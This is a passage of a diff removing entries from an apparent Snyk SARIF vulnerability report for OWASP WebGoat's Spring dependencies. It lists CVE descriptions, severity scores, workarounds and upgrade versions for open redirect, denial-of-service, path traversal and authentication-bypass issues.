-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [PoC](https://github.com/SeanPesce/CVE-2024-22243)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-918",
-                  "CWE-601",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790",
-              "shortDescription": {
-                "text": "High severity - Open Redirect vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22259) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-601",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980",
-              "shortDescription": {
-                "text": "Medium severity - Open Redirect vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22262) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n# References\n- [PoC](https://github.com/Performant-Labs/CVE-2024-22262)\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-601",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.4,
-                "security-severity": "5.4"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-7687447",
-              "shortDescription": {
-                "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38809) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the form of improper ETag prefix validation when parsing ETags from the `If-Match` or `If-None-Match` request headers. An attacker can exploit this vulnerability to cause denial of service by sending a maliciously crafted conditional HTTP request.\r\n\r\n\r\n# Workaround\r\n\r\nUsers of older, unsupported versions could enforce a size limit on `If-Match` and `If-None-Match` headers, e.g. through a `Filter`.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.38, 6.0.23, 6.1.12 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/fe4fd004291a1f2704281eb839609cf9e2fb5bea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/33372)\n- [GitHub PR](https://github.com/spring-projects/spring-framework/pull/33370)\n- [GitHub PR](https://github.com/spring-projects/spring-framework/pull/33374)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38809)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-625",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 6.9,
-                "security-severity": "6.9"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490",
-              "shortDescription": {
-                "text": "High severity - Path Traversal vulnerability in org.springframework:spring-webmvc"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38816) org.springframework:spring-webmvc@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-webmvc\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-webmvc@6.0.13\n# Overview\n[org.springframework:spring-webmvc](https://mvnrepository.com/artifact/org.springframework/spring-webmvc) is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.\n\nAffected versions of this package are vulnerable to Path Traversal via the `WebMvc.fn` and `WebFlux.fn` frameworks. An attacker can access any file on the file system that is also accessible to the process in which the Spring application is running by crafting malicious HTTP requests.\n\n**Note:**\n\nThis is only exploitable if the web application uses `RouterFunctions` to serve static resources and resource handling is explicitly configured with a `FileSystemResource` location.\n\n# Workaround\n\nThis vulnerability can be mitigated by using the Spring Security HTTP Firewall or running the application on Tomcat or Jetty.\n# Remediation\nUpgrade `org.springframework:spring-webmvc` to version 6.1.13 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/d86bf8b2056429edf5494456cffcb2b243331c49)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38816)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-38816.yaml)\n- [PoC in GitHub](https://github.com/WULINPIN/CVE-2024-38816-PoC)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-22",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230364",
-              "shortDescription": {
-                "text": "Low severity - Improper Handling of Case Sensitivity vulnerability in org.springframework:spring-context"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38820) org.springframework:spring-context@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-context\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-webmvc@6.0.13 › org.springframework:spring-context@6.0.13\n# Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n# Remediation\nUpgrade `org.springframework:spring-context` to version 6.1.14 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-178",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 2.3,
-                "security-severity": "2.3"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230365",
-              "shortDescription": {
-                "text": "Low severity - Improper Handling of Case Sensitivity vulnerability in org.springframework:spring-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38820) org.springframework:spring-core@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-test@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-test@3.1.5 › org.springframework:spring-core@6.0.13\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n# Remediation\nUpgrade `org.springframework:spring-core` to version 6.1.14 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-178",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 2.3,
-                "security-severity": "2.3"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230366",
-              "shortDescription": {
-                "text": "Low severity - Improper Handling of Case Sensitivity vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38820) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 6.1.14 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-178",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 2.3,
-                "security-severity": "2.3"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230368",
-              "shortDescription": {
-                "text": "Low severity - Improper Handling of Case Sensitivity vulnerability in org.springframework:spring-webmvc"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38820) org.springframework:spring-webmvc@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-webmvc\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-webmvc@6.0.13\n# Overview\n[org.springframework:spring-webmvc](https://mvnrepository.com/artifact/org.springframework/spring-webmvc) is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n# Remediation\nUpgrade `org.springframework:spring-webmvc` to version 6.1.14 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-178",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 2.3,
-                "security-severity": "2.3"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230373",
-              "shortDescription": {
-                "text": "High severity - Path Traversal vulnerability in org.springframework:spring-webmvc"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38819) org.springframework:spring-webmvc@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-webmvc\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-webmvc@6.0.13\n# Overview\n[org.springframework:spring-webmvc](https://mvnrepository.com/artifact/org.springframework/spring-webmvc) is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.\n\nAffected versions of this package are vulnerable to Path Traversal through the functional web frameworks `WebMvc.fn` or `WebFlux.fn`. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible.\r\n\r\n**Note:**\r\nThis is similar to [CVE-2024-38816](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-webmvc` to version 6.1.14 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/fb7890d73975a3d9e0763e0926df2bd0a608e87e)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38819)\n- [PoC in GitHub](https://github.com/masa42/CVE-2024-38819-POC)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-23",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862",
-              "shortDescription": {
-                "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework.boot:spring-boot-actuator"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-34055) org.springframework.boot:spring-boot-actuator@3.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.boot:spring-boot-actuator\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-actuator@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-actuator@3.1.5 › org.springframework.boot:spring-boot-actuator-autoconfigure@3.1.5 › org.springframework.boot:spring-boot-actuator@3.1.5\n# Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via HTTP requests, when both of these conditions are true:\r\n\r\n- Spring MVC or Spring WebFlux is in use.\r\n\r\n- `org.springframework.boot:spring-boot-actuator` is on the classpath.\r\n\r\n# Workaround\r\n\r\nThis vulnerability can be avoided by disabling web metrics: `management.metrics.enable.http.server.requests=false`\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework.boot:spring-boot-actuator` to version 2.7.18, 3.0.13, 3.1.6 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-boot/commit/5490e73922b37a7f0bdde43eb318cb1038b45d60)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-34055)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.3,
-                "security-severity": "5.3"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-9804539",
-              "shortDescription": {
-                "text": "Medium severity - Improper Input Validation vulnerability in org.springframework.boot:spring-boot-actuator-autoconfigure"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-22235) org.springframework.boot:spring-boot-actuator-autoconfigure@3.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.boot:spring-boot-actuator-autoconfigure\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-actuator@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-actuator@3.1.5 › org.springframework.boot:spring-boot-actuator-autoconfigure@3.1.5\n# Overview\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `EndpointRequest.to()` function that creates a matcher for `null/**` if the actuator endpoint, for which the `EndpointRequest` has been created, is disabled or not exposed.\n\n**Note:**\n\nThis is only exploitable if all of the following conditions are met:\n\n1) `EndpointRequest.to()` has been used in a Spring Security chain configuration;\n\n2) The endpoint which `EndpointRequest` references is disabled or not exposed via web;\n\n3) Your application handles requests to `/null` and this path needs protection.\n\n# Workaround\n\nThis can be mitigated by either:\n\n1) Making sure that the endpoint to which `EndpointRequest.to()` is referring to is enabled and exposed via web;\n\n2) Make sure that you don't handle requests to `/null`.\n# Remediation\nUpgrade `org.springframework.boot:spring-boot-actuator-autoconfigure` to version 3.3.11, 3.4.5 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-boot/commit/55f67c9a522647039fd3294dee5cb83f4888160a)\n- [Spring Security Advisory](https://spring.io/security/cve-2025-22235)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-20",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 6.9,
-                "security-severity": "6.9"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254467",
-              "shortDescription": {
-                "text": "High severity - Authentication Bypass vulnerability in org.springframework.security:spring-security-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22234) org.springframework.security:spring-security-core@6.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.security:spring-security-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 › org.springframework.security:spring-security-core@6.1.5\n# Overview\n[org.springframework.security:spring-security-core](http://spring.io/spring-security) is a package that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Authentication Bypass when directly using the `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` method and passing a null authentication parameter to it. \r\n\r\n**Note:**\r\n\r\nAn application is *not* vulnerable if any of the following is true:\r\n\r\n1) the application does not use `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` directly\r\n\r\n2) the application does not pass `null` to `AuthenticationTrustResolver.isFullyAuthenticated`\r\n\r\n3) the application only uses `isFullyAuthenticated` via [Method Security](https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html) or [HTTP Request Security](https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html)\n# Remediation\nUpgrade `org.springframework.security:spring-security-core` to version 6.1.7, 6.2.2 or higher.\n# References\n- [Advisory](https://spring.io/security/cve-2024-22234)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-287",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.4,
-                "security-severity": "7.4"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254468",
-              "shortDescription": {
-                "text": "High severity - Authentication Bypass vulnerability in org.springframework.security:spring-security-oauth2-client"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22234) org.springframework.security:spring-security-oauth2-client@6.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.security:spring-security-oauth2-client\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 › org.springframework.security:spring-security-oauth2-client@6.1.5\n# Overview\n\nAffected versions of this package are vulnerable to Authentication Bypass when directly using the `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` method and passing a null authentication parameter to it. \r\n\r\n**Note:**\r\n\r\nAn application is *not* vulnerable if any of the following is true:\r\n\r\n1) the application does not use `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` directly\r\n\r\n2) the application does not pass `null` to `AuthenticationTrustResolver.isFullyAuthenticated`\r\n\r\n3) the application only uses `isFullyAuthenticated` via [Method Security](https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html) or [HTTP Request Security](https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html)\n# Remediation\nUpgrade `org.springframework.security:spring-security-oauth2-client` to version 6.1.7, 6.2.2 or higher.\n# References\n- [Advisory](https://spring.io/security/cve-2024-22234)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-287",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.4,
-                "security-severity": "7.4"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254469",
-              "shortDescription": {
-                "text": "High severity - Authentication Bypass vulnerability in org.springframework.security:spring-security-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22234) org.springframework.security:spring-security-web@6.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.security:spring-security-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-security@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-security@3.1.5 › org.springframework.security:spring-security-web@6.1.5\n# Overview\n[org.springframework.security:spring-security-web](https://mvnrepository.com/artifact/org.springframework.security/spring-security-web) is a package within Spring Security that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Authentication Bypass when directly using the `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` method and passing a null authentication parameter to it. \r\n\r\n**Note:**\r\n\r\nAn application is *not* vulnerable if any of the following is true:\r\n\r\n1) the application does not use `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` directly\r\n\r\n2) the application does not pass `null` to `AuthenticationTrustResolver.isFullyAuthenticated`\r\n\r\n3) the application only uses `isFullyAuthenticated` via [Method Security](https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html) or [HTTP Request Security](https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html)\n# Remediation\nUpgrade `org.springframework.security:spring-security-web` to version 6.1.7, 6.2.2 or higher.\n# References\n- [Advisory](https://spring.io/security/cve-2024-22234)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-287",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.4,
-                "security-severity": "7.4"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6457293",
-              "shortDescription": {
-                "text": "High severity - Improper Access Control vulnerability in org.springframework.security:spring-security-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22257) org.springframework.security:spring-security-core@6.1.5"
-              },
-              "help": {
-                "text": "",
